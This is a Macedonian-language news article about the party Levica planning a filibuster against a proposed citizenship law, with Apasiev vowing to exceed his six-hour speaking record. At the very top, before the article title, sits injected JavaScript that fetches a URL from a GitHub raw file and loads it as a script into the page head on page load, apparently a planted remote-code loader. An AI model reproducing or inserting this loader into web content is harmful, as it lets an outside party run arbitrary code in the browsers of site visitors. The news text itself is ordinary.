;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Како професор говорел 6 часа - дали истата судбина ќе ја доживее Законот за државјанство? - Антропол
АктуелноЛокално

Како професор говорел 6 часа – дали истата судбина ќе ја доживее Законот за државјанство?

Политичката партија Левица вчера најави дека ќе го искористи традиционалниот филибастеринг со долги говори и молчење, со цел да го спречи предлог-Законот за државјанства. Апасиев, потсетувајќи на времињата од пред една деценија, кога Талат Џафери како пратеник читаше поезија и молчеше за да го спречи Законот за бранители, најави дека ќе го искористи истиот тип на филибастеринг.

„Очигледно ќе ја правиме големата магија… Јас ќе седам бидејќи планирам долго да говорам. Како професор најдолгото ми е шест часа, се надевам дека ќе го надминам. Штом немате добра волја, немаме ни ние. Како професор по право, првата лекција на студентите што им ја кажуваме е дека кога има неправда, не смеете да отстапувате пред неправдата; вие не’ терате истото тоа да го правиме тука.” – рече Апасиев на комисиската расправа, при што дополна дека амандманите на ВМРО-ДПМНЕ не можат да бидат повлечени од координаторот на пратеничката група, туку мора да бидат повлечени од секој потпишан пратеник поединечно.

На обраќањето на Апасиев, следеа дофрлувања од пратениците на Алијанса и Алтернатива за Албанците, кои напуштајќи ја салата, ги обвинија Левица дека шират национализам, на што пратеникот Крмов им возврати да се погледнат во огледало пред да говорат за национализам.